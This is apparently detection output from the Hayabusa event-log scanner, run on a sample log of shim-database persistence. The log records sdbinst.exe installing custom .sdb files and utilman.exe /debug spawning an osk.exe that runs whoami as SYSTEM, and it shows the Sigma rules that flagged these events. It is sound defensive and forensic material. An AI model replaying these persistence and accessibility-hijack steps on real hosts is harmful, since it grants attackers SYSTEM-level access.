winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" : Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.304 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:28.815 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:31.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:35.745 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe"" : Path: C:\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\osk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\wsqmcons.exe ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb : Path: C:\Windows\System32\rundll32.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx -2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" 